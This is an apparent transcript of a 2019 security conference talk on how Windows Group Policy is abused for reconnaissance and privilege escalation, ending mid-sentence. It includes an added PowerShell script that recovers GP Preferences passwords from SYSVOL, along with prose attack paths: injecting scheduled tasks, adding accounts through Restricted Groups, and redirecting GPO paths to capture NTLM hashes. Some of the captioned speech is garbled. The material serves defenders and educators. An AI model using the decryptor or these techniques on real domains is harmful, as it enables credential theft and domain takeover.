
G1234! - Exploiting Windows Group Policy for Reconnaissance and Attack - Darren Mar-Elia

BSides Las Vegas · 55:23 · 308 views · Published 2019-10
About this talk
G1234! - Exploiting Windows Group Policy for Reconnaissance and Attack - Darren Mar-Elia. Ground1234! track, BSidesLV 2019, Tuscany Hotel, Aug 07, 2019.
Transcript [en]

This talk is "Exploiting Windows Group Policy for Reconnaissance and Attack" by Darren Mar-Elia. We have a few announcements before we begin. We'd like to thank our sponsors, Critical Stack and [inaudible], and our stellar sponsors Robinhood, Secure Code Warrior and Paranoids; their support, along with our other sponsors, donors and volunteers, makes this event possible. These talks are being streamed live, so as a courtesy to our speakers and the audience we ask that you check that your cell phones are set to silent. If you have any questions, we will use the audience mic after the talk so that the YouTube viewers can hear the questions and the answers, so afterwards please raise your hand and I'll bring the mic to you. Thank you.

How's everyone doing? I really appreciate the turnout for such a topic as Group Policy. I've been speaking for about 20 years, mostly at IT conferences, but this is my first time at BSides, so I'm super happy to be here. How many of you are reasonably familiar with Group Policy? Awesome. So I won't spend a ton of time on the guts of Group Policy, although I think it's worthwhile to review it just to make sure we're all on the same page. Questions are at the end, so if you do have questions as I'm talking, try to remember them, write them down or something, and I'll make sure I leave time for questions afterwards.

A little bit about me. My day job is head of product at a company called Semperis; we do Active Directory protection and disaster recovery. I founded a website that many of you may have visited in your travels, gpoguy.com, back in 2004, and a company called SDM Software that created, and still creates, commercial Group Policy software. I was a 14-time Microsoft Group Policy MVP, until Microsoft summarily executed all Group Policy MVPs last year, so the reign of Group Policy MVPs has come to an end: there wasn't enough cloudiness in Group Policy for Microsoft's tastes, so they got rid of a whole swath of MVPs, including myself. I spent a bunch of years of my career, probably half of it, in enterprise IT for financial services and software companies. I have a Group Policy training course out on Pluralsight and some projects out on GitHub. As the pictures indicate, I have two incongruous hobbies, bike racing and making wine, that I try not to mix, but that's what I do for fun for the most part. Let's see if I can make PowerPoint do what I want.

Just a little bit of what we're going to talk about: a review of what Group Policy is, what it does and how it works; some of the reconnaissance benefits of Group Policy; the benefits, in quotes, of attacking Group Policy, what are some of the things attackers can do with it; and then a little bit on defending against that.

So what is Group Policy? A built-in configuration management technology for Windows and Active Directory; a roadmap to an organization's Windows security posture; a malware delivery vehicle; or all of the above. Can anyone guess which answer is correct? Right.

Interestingly, the last time I was at BSides here was in 2016. At that time I had been working with Active Directory and Group Policy for 16 or 17 years, blissfully ignorant of the threats against both, and I sat in a room just like this and listened to a talk about BloodHound. How many of you are familiar with BloodHound? Yeah, it's an amazing tool, and my eyes were opened. I started to think about how Group Policy would benefit, or not, from the same kinds of approaches the guys were doing with BloodHound. After the original release of BloodHound they released a GPO release that had a bunch of discovery in it, which I'll talk about in a little bit, but it got me thinking about this whole notion of Group Policy from a security angle, and that was my path to where I got to today, talking about Group Policy and security.

I have a mailing list with something like 17,000 people on it, and every couple of years or so I do a survey to try to understand what people are doing with Group Policy, how it's changing, whether everyone is mass-migrating to Intune because it's so awesome, stuff like that. One of the things I asked is how you are using Group Policy, and this is useful for understanding what the attack surface looks like in most organizations. Group Policy is used 80-plus percent for general administrative templates; lockdown, security hardening and general registry tweaks, just under 80 percent; and then the other parts of Group Policy come in here: drive and printer mapping is pretty high, folder redirection, browser configuration. All of this stuff is 50-plus percent in most organizations. So it's worthwhile to know that if you're in a position of using Group Policy to secure your environment, this talk is very relevant to you, and it's also very relevant to an attacker looking to exploit Group Policy to worm their way into your environment.

Now, about the structure of GPOs, because I think it's important when we're thinking about abusing Group Policy. There are a lot of words on this page, but basically there are two sides to a Group Policy Object. This is the way Microsoft architected it from the beginning, for better or worse. There's a piece in AD called the GPC; it's in the CN=Policies,CN=System container. You'll see a bunch of GUID-named containers, as you can see in that screenshot. Each one of those GUID-named containers represents one GPO, and on that container is a set of attributes that hold the friendly name of the GPO, the path to the other side of the GPO, the version number of the GPO, information we'll talk about a little more that's relevant to how Group Policy functions.

As I implied, the other side of the Group Policy Object is called the Group Policy Template, or GPT, and that sits in SYSVOL. Now, this was a huge problem in the early days of Windows 2000 and Windows 2003, because Microsoft had this really wonky mechanism called FRS that would replicate SYSVOL to every domain controller, sometimes. So you'd have this situation where you'd make a change to a GPO and the AD side would be changed but the SYSVOL side wouldn't replicate, so the clients would think that something had changed in the GPO but didn't really get the new settings, and it was the cause of a lot of consternation. We now have DFS-R, which is more robust and allows SYSVOL to be more consistent across all the DCs. You still have some latency and some difference in replication between the AD part of the GPO and the SYSVOL part; they're not going to replicate identically at the same time, but such is life. It's a best-effort scenario in that case. But the point is you have these two pieces of the GPO that are supposed to be synchronized from the perspective of permissions and content. So when you edit a GPO, by default it's targeting the PDC emulator domain controller in your domain. When that happens the change is made to the AD side, the change is made to the SYSVOL side, and then it replicates out from there. That's the way it's supposed to work.

The other thing to know about the GPT is that this is where most of the settings storage occurs. So when you're defining an admin template setting, or a GP Preferences drive mapping, or a security hardening setting, it's getting written to files in SYSVOL. There are a few exceptions to that. One is software installation; software installation is a part of Group Policy, not terribly used anymore, where you can deploy MSI files. That particular area writes a piece to AD and a piece to SYSVOL, so it's split between the two.

OK, so why am I talking about this? The point, and we'll get into it in a little bit, is that you have to pay attention to both sides of the GPO from an attack perspective, because attackers can take advantage of inconsistencies on either side, mostly in delegation, to put stuff into Group Policy Objects that shouldn't be there.

When we talk about processing of Group Policy, it is strictly a client-side operation, meaning that whether it's Windows Server, Windows desktop or Windows workstation, the client is doing the work of pulling down the Group Policy. When it does that, it does it in two phases.

The first phase is basically "tell me all the GPOs that apply to me"; that's called the core phase. The core phase gets done: it queries AD using LDAP, determines which GPOs apply to it, and it's got its list. It says, OK, I know which GPOs apply, I know which policy areas are in each of those GPOs, so now I'm going to call the client-side extensions, or CSEs, to bring down the settings storage for each GPO, basically by policy area, and process it: do whatever it says, map a drive, make a registry setting change, apply a security configuration, whatever it happens to be. The CSE is responsible for actually processing the policy; that's a DLL that sits in Windows\System32. Microsoft ships a bunch of CSEs out of the box. A little-known fact: this is an extensible framework; it was meant to be an extensible framework from the very beginning. There are third-party vendors that have extended Group Policy. Essentially what that means is writing a new CSE and writing a new MMC snap-in for the GP editor to be able to set those settings, but you can do it with a little C++ knowledge and the ability to register the CSE in the registry. You need to be an admin to register a new CSE, but if you are an admin you can register that CSE and provide new policy functionality.

So I went through that. Settings are per computer or per user, but in either case, as of MS16-072 I think, when per-user policy processing runs, it runs in the context of the machine account, Local System, and then it impersonates the user to make the user-specific changes. The reason they made that change, I don't recall the exact scenario now, was that there were some man-in-the-middle attacks on Group Policy processing that took advantage of the fact that GP processing for the user was running in the user context, so they moved GP processing for the user into the machine context. They broke a whole bunch of IT shops in one fell swoop, because when you rolled out MS16-072, all of the GPOs that you had filtered by user security groups didn't work anymore, because you now had to grant the computer access to that GPO in addition to the user group. More detail than is useful at this point, but I just wanted to set that context.

GPOs get refreshed on clients and member servers every 90 minutes by default, plus a 30-minute randomizer, so it could be 90, it could be 120 or anywhere in between, and it's five minutes on domain controllers. Why this is important is that if somebody messes with a GPO thinking that it's going to have an immediate effect, it doesn't. In a large enough organization with sufficient randomization you probably have machines refreshing Group Policy all the time, but the point is that it's not going to be instantaneous across the organization when you make a change to a GPO.

So, targeting. You create a GPO in AD; it does nothing until you link it to something. You link it to a site, an AD site, which is just a collection of IP subnet definitions in AD; you link it to a domain, at the domain NC head, which is the top level of AD; or you link it to an OU, an organizational unit. Once that's done, all other things being equal, you will start applying that GPO to computers and users in AD, and there's an order of precedence to that. On every Windows SKU, server or workstation, there's a local GPO; there's actually something called multiple local GPOs that they introduced in Vista, which is probably an area for exploit, but I haven't really dug into it too much. The point is that there is this concept of the local GPO that you can edit just on that machine to set its policy. It will be overridden by any site-linked GPOs if there's a conflict, by any domain-linked GPOs, and then by any OU-linked GPOs. So you have this order of inheritance with Group Policy: local, site, domain, OU, where you could have ten different policies applying to a given computer account, and if there are conflicts along the way, the last writer wins, meaning the OU-linked ones win.

Now there are two things you can do to disrupt that. You can set a link higher up, let's say at the site level, to Enforced; that will always win over conflicting settings set at the OU level. At the OU level you can Block Inheritance; Block Inheritance says, everything above me in the order of precedence, ignore it. The Enforced link wins out over Block Inheritance, so Enforced wins in every situation. That's useful to know, both to the attacker and the defender, because if you're an attacker and you're able to write GPO links, what are you going to do with that link? You're going to make it Enforced, because it will beat out everything that somebody tries to do to circumvent you down below. Also, on a given OU you can have 10, 15, 20 GPOs linked, and there's an order of precedence among those as you're looking in the tooling; I'll show you this in a little bit.

So you've got linking, but maybe you want to get more granular about who in the OU you want that policy to apply to. You have a number of different filtering criteria. You have security groups: you can say on the GPO, only apply this to members of the Marketing Users group in the Marketing OU. You have WMI filters that you can attach to a GPO, one WMI filter per GPO. The WMI filter is a WMI query that gets executed by the client: if it's true, the GPO applies; if it's false, it doesn't. The WMI query is used for things like "only apply this to Windows 7 machines" or "Windows 10 machines". And then you have GP Preferences, which is a section of Group Policy, and I'll show this so it becomes real: in each of the GP Preferences areas you have something called item-level targeting, where you can do filtering on a per-setting basis. If it's any wonder why people hate Group Policy, this slide captures it beautifully. It is super complex, and that complexity is both a blessing and a curse, because it gives you a lot of flexibility, but it gives attackers lots of surface area to go mess around.
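An added example, written for this page rather than taken from the talk or from any of the tools it mentions: the linking state just described is stored on the container (site, domain or OU) in two AD attributes, gPLink (the list of linked GPOs, each with an options bit field) and gPOptions (Block Inheritance). This PowerShell decodes both without GPMC, using only the ActiveDirectory module and the read access every authenticated user has. The gPLink string is constructed for the demonstration (it reuses the two default GPO GUIDs under an assumed DC=example,DC=local); the live part at the end assumes a session joined to the domain. Link precedence order is not derived here.

```powershell
# Added example (not from the talk). Decodes gPLink / gPOptions on a container.
# gPLink format: "[LDAP://cn={GUID},cn=policies,cn=system,DC=...;N][...;N]" where N is a
# bit field: 1 = link disabled, 2 = Enforced. gPOptions = 1 on the container = Block Inheritance.
function ConvertFrom-GPLink {
    param([string]$GPLink, [int]$GPOptions = 0)
    $links = foreach ($m in [regex]::Matches([string]$GPLink, '(?i)\[LDAP://([^;\]]+);(\d+)\]')) {
        $flags = [int]$m.Groups[2].Value
        [pscustomobject]@{
            GpoDn    = $m.Groups[1].Value
            GpoGuid  = [regex]::Match($m.Groups[1].Value, '\{[0-9A-Fa-f-]{36}\}').Value
            Enforced = [bool]($flags -band 2)
            Disabled = [bool]($flags -band 1)
        }
    }
    [pscustomobject]@{
        BlockInheritance = [bool]($GPOptions -band 1)
        Links            = @($links)
    }
}

# Constructed sample (assumed domain DC=example,DC=local): two links, the second Enforced,
# on an OU that has Block Inheritance set. The GUIDs are the two default GPOs' well-known GUIDs.
$sampleGPLink = '[LDAP://cn={31B2F340-016D-11D2-945F-00C04FB984F9},cn=policies,cn=system,DC=example,DC=local;0]' +
                '[LDAP://cn={6AC1786C-016F-11D2-945F-00C04FB984F9},cn=policies,cn=system,DC=example,DC=local;2]'
$parsed = ConvertFrom-GPLink -GPLink $sampleGPLink -GPOptions 1
$parsed.Links | Format-Table GpoGuid, Enforced, Disabled -AutoSize
"Block Inheritance: $($parsed.BlockInheritance)"

# Live use: read the attributes straight from AD (no GPMC) and list every Enforced link in the
# domain's OUs, which is what an attacker with link-write rights would set and a defender should review.
Import-Module ActiveDirectory
function Get-ContainerGPLinks {
    param([Parameter(Mandatory)][string]$ContainerDn)   # site, domain or OU DN
    $obj = Get-ADObject -Identity $ContainerDn -Properties gPLink, gPOptions
    ConvertFrom-GPLink -GPLink $obj.gPLink -GPOptions ([int]$obj.gPOptions)
}
Get-ADOrganizationalUnit -Filter * -Properties gPLink, gPOptions |
    ForEach-Object {
        $ou = $_
        (ConvertFrom-GPLink -GPLink $ou.gPLink -GPOptions ([int]$ou.gPOptions)).Links |
            Where-Object Enforced |
            Select-Object @{n = 'Container'; e = { $ou.DistinguishedName }}, GpoGuid, Disabled
    }
```

Get-ContainerGPLinks works the same way for the domain head and for site objects under CN=Sites,CN=Configuration; the Enforced flag is the one to watch, because, as the talk says, it beats Block Inheritance everywhere below it.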

This last point is important: Group Policy is normally only updated on the client if something in AD has changed. In other words, if the GPO is updated it gets a new version number. The client wakes up for its Group Policy processing cycle and says, the last version I processed is 2; what is the version on the GPO? It looks in AD for the version. It ignores SYSVOL, where there's a version too, but that doesn't get updated anymore; it's only looking at AD. If AD says 2, it doesn't process the GPO that time around; it just ignores it. So if somebody has tinkered with the GPO but hasn't messed with the version number, it's not going to pick up that tinkering. That's important. Now there are ways to circumvent that on a per-CSE basis, but all other things being equal, if the version numbers are the same on the client and in AD, the GPO is ignored during that cycle.

Before I move on, I want to show a little of this stuff so that it's not so abstract. I'm sure most of you have messed around with this, so I'm not telling you anything you don't know, but here's my domain, testme.net. I have one GPO linked at the domain level, and I have all these nifty OUs. You can see the GPOs that are linked at the Clients OU, for example; I have three of them there. The one at the top of the list gets processed last, so it wins if it conflicts with any of the other ones. If there are conflicts between the Default Domain Policy and any of these, then these guys win, because they're lower in the pecking order: last writer wins. If I come down to the AD site, I actually have no GPOs linked at the site, but if I had a GPO linked here it would be processed first, or rather after the local GPO, on that particular client, so if there were conflicts between it and the domain or the OU, the site-linked one would lose.

Now if I dig into a particular GPO, I've got the computer side and the user side, pretty straightforward; we have Policies and Preferences. When I was talking about item-level targeting on Preferences: if I create a preference, let's just do something simple, I'm going to say C:... I'll just do enough to get me into this. You can see what item-level targeting looks like on that particular setting: I now have 27 different possible types of targeting I can do, in ANDed and ORed combinations if I choose to, to further filter that GPO. So lots of opportunity here for confusion.

That's a review of what I just talked about. Let me quickly show you what I mean: here's the GPC, the AD part, the Group Policy Container. Each one of these GUID folders represents a GPO. If I come into the properties of that and look at the attribute editor, you will see the display name of the GPO, you'll see the GUID of the GPO, the distinguished name, and, if I come all the way down to the end, the version number. That is the version number of the GPO that the client looks at when it's trying to determine whether anything has changed, and I'll refer to this in a little bit.

There are also these two attributes, gPCMachineExtensionNames and gPCUserExtensionNames; these hold the GUIDs of the policy areas implemented in this GPO. This is super important when it comes time to talk about tinkering with your policy setting storage: these GUIDs have to exist for the corresponding policy areas that are in the GPO or the client will simply ignore it. And not only do they have to exist in the GPC, they have to be sorted alphanumerically. I've had some people talk to me about injecting settings into Group Policy Objects: they're able to do it, but they can't figure out why it's not working on the client. This tends to be the reason: the GUIDs, not the GUID, it's actually a pair of GUIDs, are not there for that particular policy area, or they're not sorted. Maybe they're there, I discovered this early on, but if they're not sorted they're also ignored by the client. So there's a very precise way of messing with Group Policy that you have to be aware of as an attacker, or even as a defender, frankly.

OK, let me get back into this deck. So why is GP useful for reconnaissance? Well, as I indicated in that little survey I showed, many IT

shops are using it for security hardening. A lot of the baselines you get from the standards bodies or from Microsoft come in the form of Group Policy Object backups; they're basically telling you, use Group Policy for this. Of course Microsoft has other technology, like SCCM, that they offer for this, but for most shops it's free, it's in the box, it's generally well understood; they use Group Policy to do security hardening. And they're doing it for, not necessarily in order of importance but certainly close: local group membership, like setting local Administrators; configuring user rights, so who can Debug Programs, who can Log On Locally, who can Access This Computer From The Network, who has Remote Desktop access to the computer; their user rights control all that stuff. Security options, like whether UAC, User Account Control, is enabled or not; all that's set in Group Policy. How many of you are doing admin tiering? Microsoft talks about tier 0, tier 1, tier 2. Of those of you doing admin tiering, how many are implementing admin tiering enforcement through Group Policy? Yep, roughly the same amount. So the ability to control who can log on to domain controllers, who can log on to servers and workstations, that's all implemented in Group Policy. Password policy: how many characters should the password be, how long should it last, should it lock out. And then configuring local admin passwords used to be a feature in Group Policy Preferences. How many of you used Group Policy Preferences to configure local admin passwords? Surprisingly few; that's good. I've heard that this is still a problem: when pen testers go into a Windows environment they're finding these things littered all over the place. Why is it a problem? Because as part of Microsoft's protocol docs they published the encryption key for the policy storage, and it uses the same encryption key for every single implementation, so you can decrypt all of the passwords in Group Policy storage.

And as I mentioned, the last point here, which is the most important point for Group Policy as a reconnaissance tool: GPOs are world-readable by default. Every authenticated user in the domain gets read access when a GPO gets created, to your security hardening, to your drive mapping; the most trivial stuff and the most important stuff is world-readable. If I'm authenticated to AD, and in this day and age it's not that tough to get a foothold in an environment even as a non-privileged user, then as a non-privileged user I can run BloodHound, for example, and get a map of who's in admin groups on which machines, or other tools will let me read the password out of GP Preferences so that I can log on to a machine as admin. So this world-readable thing is a blessing and a curse as well.

I wanted to highlight some tools that are useful for reconnaissance of Group Policy. PowerView, part of PowerSploit, has a bunch of PowerShell cmdlets for enumerating admin access on machines by user. New-GPOImmediateTask is actually a working sample of injecting settings, in this case a scheduled task, into a GP Preference on an existing GPO. It assumes you have access, of course, but the point is, with this cmdlet you can do that. SharpHound, which is the ingestor, the data collector for BloodHound, collects a lot of the same information: if you set it to run in that mode, using Group Policy, without hitting the machine itself, I can figure out who's local admin on a machine; I think it's part of the so-called stealth mode, using Group Policy to determine who's an admin on which machines in the environment. And then Grouper2 is my new favorite plaything. This is written by @l0ss; he's out in Perth, Australia, and it is super cool. If you haven't downloaded and tried Grouper2, it is a great tool. I'll show it to you in a minute, but basically what he's done is gone through and come up with a list of things that represent a potential problem in Group Policy from a security perspective, everything from permissions on GPOs, to local admins being added through GPOs, to GP Preferences passwords being found in GPOs. If you run Grouper2 against your AD environment it'll enumerate all of these, give each a risk score, or I think he calls it an interest level, and let you assess in one fell swoop all of the potential issues you have to worry about from a Group Policy perspective.

So let me drop in and show some of this stuff. I've got one up on the screen here. This is a PowerView cmdlet called Find-GPOComputerAdmin; I pass it a computer name and the domain name, and it tells me what policies are granting which users admin access or Remote Desktop access on this machine, this Windows 10 client. It's called out this group called Tier 2 Admins, which is a member of local Administrators; you can see it's a group in this GPO, and it's using the GP Preferences Local Users and Groups feature to grant that access. This one is Domain Users being granted Remote Desktop Users access in this GPO, using Restricted Groups policy. So it's really great at calling that out for a given machine, or I can flip it around and ask for a particular user: where does this user have admin access? Now this is a fairly simple environment, but you can imagine, if you're an attacker trying to get access to this information, running it across an entire environment, you're going to get a lot of good information.

The common thread for all of these tools is that the person running the tool doesn't require GPMC. I don't know if I'd call it a stumbling block, but it was a hurdle for any tool trying to assess Group Policy, because if you're not using GPMC you have to write it all from scratch. All of these tools have taken that on: you don't need GPMC, and they don't use any of the GPMC libraries. That's super handy, because you can drop these tools on any machine and execute them effectively against a Group Policy environment.

Let me shift gears and show you how Grouper2 works. It's pretty straightforward; I'm just going to run it as is, in "pretty mode", quote-unquote, and it goes out and munches through your Group Policies, and then it starts showing all of the different parameters of things it's looking for, and the interest level. So NT services, there are some immediate tasks in here. I won't go through the whole thing because it's a little hard to read on the screen like this, but essentially what it's doing is looking for anything interesting from a security perspective and dumping it out to this report. That includes, I'll talk about this in a little bit, permissions on GPOs, linking, and settings that might be interesting, like security settings, local group membership, all that. OK.
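An added example, not from the talk and not Grouper2 or PowerView code, for the GP Preferences password point made earlier: the decryption is exactly what the published protocol documentation describes (AES-256 in CBC mode with an all-zero IV, PKCS7 padding, UTF-16LE plaintext, base64 with its '=' padding stripped) using the single key Microsoft published. The Groups.xml fragment, the user name and the password in it are constructed; the encryptor exists only to build that sample. The commented-out last lines show where the real files sit in SYSVOL.

```powershell
# Added example (not from the talk). Decrypts a GP Preferences cpassword as MS-GPPREF defines it.
# The 32-byte AES key below is the one published in the protocol documentation and used by every
# GPP implementation, which is why these passwords are recoverable by any authenticated user.
$GppAesKey = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                      0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

function New-GppAes {
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key     = $GppAesKey
    $aes.IV      = [byte[]]::new(16)          # all-zero IV, per the spec
    $aes
}

function ConvertFrom-GppCpassword {
    param([Parameter(Mandatory)][string]$Cpassword)
    # The attribute value drops base64 '=' padding; restore it before decoding.
    $b64 = $Cpassword + ('=' * ((4 - $Cpassword.Length % 4) % 4))
    $ct  = [Convert]::FromBase64String($b64)
    $aes = New-GppAes
    $pt  = $aes.CreateDecryptor().TransformFinalBlock($ct, 0, $ct.Length)
    $aes.Dispose()
    [System.Text.Encoding]::Unicode.GetString($pt)     # plaintext is UTF-16LE
}

function ConvertTo-GppCpassword {
    # Used only to construct a realistic sample below; GPP itself never exposes an encryptor.
    param([Parameter(Mandatory)][string]$Password)
    $pt  = [System.Text.Encoding]::Unicode.GetBytes($Password)
    $aes = New-GppAes
    $ct  = $aes.CreateEncryptor().TransformFinalBlock($pt, 0, $pt.Length)
    $aes.Dispose()
    [Convert]::ToBase64String($ct).TrimEnd('=')
}

# Constructed Groups.xml fragment in the shape GPP Local Users and Groups writes under
# \\<domain>\SYSVOL\<domain>\Policies\{GUID}\Machine\Preferences\Groups\Groups.xml.
# User name and password are made up here; nothing below came from a real domain.
$sampleXml = @"
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="localadmin" changed="2019-08-07 10:00:00">
    <Properties action="U" cpassword="$(ConvertTo-GppCpassword 'Summer2019!')" userName="localadmin"/>
  </User>
</Groups>
"@

function Get-GppPasswordsFromXml {
    # Returns one object per element carrying a cpassword attribute, with the recovered plaintext.
    param([Parameter(Mandatory)][string]$Xml)
    [xml]$doc = $Xml
    foreach ($node in $doc.SelectNodes('//Properties[@cpassword]')) {
        [pscustomobject]@{
            UserName = $node.userName
            Password = ConvertFrom-GppCpassword $node.cpassword
        }
    }
}
Get-GppPasswordsFromXml $sampleXml      # recovers 'Summer2019!' for localadmin

# Live use against SYSVOL (read access is all that is needed):
# Get-ChildItem "\\$env:USERDNSDOMAIN\SYSVOL\$env:USERDNSDOMAIN\Policies" -Recurse `
#     -Include Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml |
#     ForEach-Object { Get-GppPasswordsFromXml (Get-Content $_.FullName -Raw) }
```

The defender-side use is the same scan: any element with a cpassword attribute in SYSVOL is a credential disclosed to every authenticated user, and the fix is to delete the preference item and rotate that account, not to edit the file.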

So let's talk about attacking Group Policy. Actually, before I do that, I meant to show you one other thing that I'm getting ready to release in the next couple of months. I built this Group Policy SDK many years ago for reading and writing GPO settings. One of the challenges that tools like Grouper2, or any of these tools, have is that if you're trying to determine the settings in an existing Group Policy Object, there is no API for that, especially without GPMC. You can't run a settings report like you can in GPMC; it's just reading the raw storage files and then trying to parse them to make sense of them, and that's super time-consuming. I went through that ordeal many years ago to write this SDK, and I've been working on decoupling the read part of it. There's a getter part and a setter part, where you can actually write settings to Group Policy Objects; it also doesn't use GPMC. The reader part I'm decoupling and making available on my GitHub account as soon as I can get the code cleaned up and all the swear words against Microsoft taken out. But I wanted to show you a little bit about how it works. The first line here, if you can see it, gets a reference to a particular GPO. The second line gets a reference to a setting path, and you can see that you can use this by just referring to the English-language setting path as it appears in GP Editor. That's the powerful part: you don't have to parse XML or some weird INF file, you can just refer to the setting path. You can find out whether a given setting is defined or not, and this particular line is just looking for who has been granted the Debug Programs user right in this GPO. Then if I find one that's set to 1, in other words it's defined, I want to see what the value of that is. So if I come down here, I'm just going to paste it into PowerShell because it's easier, and if I run it you'll see that it's returned the group that's been granted Debug Programs in that GPO, at that setting path. So it's a super easy way of querying GPOs without GPMC, programmatically, from the command line; the underlying code you can use from C# or PowerShell, it doesn't really matter. So keep an eye on the GitHub page I mentioned earlier if you're interested in that; hopefully it'll be dropping soon.

All right, attack paths. Weak write permissions on the GPC or GPT for one or more GPOs. What's the opportunity here? Writing new settings into a Group Policy Object to execute arbitrary code. Think about all the things that Group Policy can do; it's like a smorgasbord of execution. There are scheduled tasks, there are logon and startup scripts, there's software installation, there are shortcuts. All these things get sent to the client, where the client clicks on something or does something and it executes code somewhere, and the instruction for where to execute that code is stored in the GPO. If it's a shortcut, it's a path to a file; that path can be manipulated, changed, added, whatever. If you have write access to the GPO you can make arbitrary changes to it. Scheduled tasks are a good example, because of New-GPOImmediateTask from PowerView. I've actually seen this used in the wild in malware: once the attacker got into the environment they used this, or something like it, to put immediate tasks in a GPO that executed on all the machines, and what did the immediate tasks do? They installed the malware on every machine that processed the GPO. You can multiply that. The only limiter today is the complexity of writing to setting storage, because, if you'll recall, I said that in the GPT, where settings are stored, every policy area, not every but almost every policy area, has a different storage format for expressing settings. If I'm doing user rights assignments or security options, it's in a file called GptTmpl.inf; if I'm doing GP Preferences shortcuts, it's in an XML file; if I'm doing GP Preferences scheduled tasks, it's in a different XML file with a different schema and a different set of attributes; every single one. Microsoft did us a favor here: it's really hard to write a unified SDK that writes settings into a GPO programmatically. It's hard, and I can't tell you the pain and suffering I went through to do it over a number of years, and I'm still working on it. It's not an easy task, but if you have a very defined target, like scheduled tasks, like logon or startup scripts, like security hardening settings, then it's a lot easier if you're just going after a few of those setting areas.

So what are the challenges to doing this? You'll remember I talked about those GPC extension GUIDs that have to be in a GPO for each policy area implemented in that GPO. Here's an example: I'm an attacker, I'm in the environment, I'm running New-GPOImmediateTask and I poke an XML file with the task into a GPO that doesn't have scheduled tasks defined in it. Well, unless I'm also poking the GUIDs for scheduled tasks into the AD part of that GPO, the clients are just going to ignore it; they don't care. So as an attacker I have to find a GPO that already has scheduled tasks added to it, and add my arbitrary execution code into that GPO's storage. Does that make sense? So the process is: I need write permissions on the GPT. I don't even need to touch the GPC; if I'm an attacker, all I care about is that the GPT gives me write permissions. I've got write permissions, I'm trying to write a scheduled task, I need to find GPOs that are linked to targets I care about; in other words, you want to find a GPO that's linked to as many clients or users as possible, so you probably want one linked at the domain level. GPOs linked at the domain level are processed by every computer and every user in the domain by default. So I want to find a good target GPO that has scheduled tasks implemented in it already, and then I can push my XML into that GPT. Great, but that's a challenge; it reduces the opportunity. For new policy areas, if I want to write a new policy area, I have to have permissions to write to the GPC, the AD part; I need to be able to add those extension GUIDs to the GPC. And again, as I mentioned, if I'm only modifying the GPT, only writing that scheduled task to the GPT part of the GPO, and I'm not touching the version number in AD, then it may be a while before the clients know about that; they may not pick it up. So if I'm an impatient attacker, it might not get me where I need to be. Now, you can touch the version number on the GPC, if you have write permissions on it, and increment it, say by one, and then the client will say, oh, something's changed, pick it up, let's go.

Weak write permissions on containers.

so this is the ability to link and unlink arbitrary GPOs to target users and computers so let's say I have a GPO that I created because I was able to get privileged access on a user account that had the ability to create GPOs so I created a malicious GPO it doesn't do anything just sitting there I have to link it to something the next thing I want is write permissions on container objects Oh use domain sites so that I can link my malicious GPO to as many targets as possible so that's the the piece that you know kind of if I have both creation editing rights on a GPO and I can link to it to one or more

containers all bets are off I can do whatever I want including if I can link that GPO to a domain controller so you or the domain there's a neat little knot we're very well-documented feature in restricted groups policy remember I was using restricted groups policy to grant admin access on my machines you could target domain groups with restricted groups policy Microsoft doesn't recommend it I don't recommend it but let's say I have I've gotten into the environment I've created a group or a user account I can create a restricted groups policy that says put that user account or group into local administrators and I linked that to the default domain controllers or the defects Cuse me the domain controllers

oh you or even the domain and what happens when the domain controller processes it it says oh I need to add this user a group to administrators well the only administrators I know about is the one in AD so it puts that user in group or group into the administrators group excuse me in ad and your now you've gone from just a lowly regular person to a domain administrator okay pretty much talked about what you can do with linking and unlinking you know it works well it works the same way for unlinking if I can unlink hardening then I can weaken the security posture of the organization so it's just as bad to be able to change links on to unlink

as it is to create links I want to just gonna drop out of here for a second to just show what I'm talking about with links apologize I got a little tickle in my throat so if I'm on and oh you let's say I'm on this client so you if I look at the properties of the oh you itself you'll see that marketing admins has been added to the delegation of this oh you and I think this is the one that I mucked with if I come down here to the permissions on marketing admins and go down to the permissions on the property what you'll notice is I have right GP options and on the other ace right next

to it I have right GP link that is the permission I need to be able to link an unlink a GPO on that oh you so if any user or computer or group or whatever has the ability to write to GP link I can link a GPO to that oh you okay all right so what are the challenges well you need to find existing GPOs that suit your purposes let's say you have link permissions but you don't have permissions to edit GPOs that's okay you can use tools like Power View to find interesting GPOs that grant admin access or do something you know from a settings perspective that is advantageous to your position and then you can use those

existing GPOs to link to containers where maybe you have a user account that you've already compromised external paths this is one I just wrote up in the past four or five months so you have GPOs and the permissions on the GPOs that may not grant write access but in the GPO you're referencing external storage locations like logon scripts that point to a server share somewhere or shortcuts that point to a server share somewhere printers files where you're copying files from one location to another all of these can contain external references paths to servers that are not in sis fall so even if you're a your GPOs are completely locked down and you can't you know attacker can't write to

them easily if they can get to the server where you have the logon script stored and they have write access to that it doesn't matter they've just essentially put whatever script they wanted in place of the script that the GPO is a referencing and they can do whatever they want in that script so you have to think about hardening not only the GPO but any external paths that it calls and group or to looks for that in GPOs that you have I mean a part of this is about discovery in a in a reasonable size organization you might have hundreds of GPOs I had one customer that had 10,000 GPOs not fun so imagine having to go

through that and find out all these nooks and crannies now the challenge of course in this is you still have to have a as to those external servers that are being referenced by the GPO s okay I'm gonna try to zoom through because I know we're running out of time GPT redirection let's say I have write permissions on the GPC the ad side of the GPO when I talked when I showed the ad side of the GPO I brought up the attribute editor let me just and there's an attribute in the attribute editor called GPC file suspend the GPT the sysvol folder guess what I can change this to any UNC path and that's what

this particular attack is all about if I can make that change I can redirect it to some server some SMB share somewhere with a copy of the GPO settings with some alterations that I made for my benefit and so when the client processes group policy they will pull this down from this external share happily without thinking about it now when I first published this a guy in Germany tagged null de did some work on it and and found that using this technique he stood up an impact SMB server to be the external share and watched the the hashes rein in as clients and users were accessing Group Policy ntlm hashes so it you know it wasn't like Universal

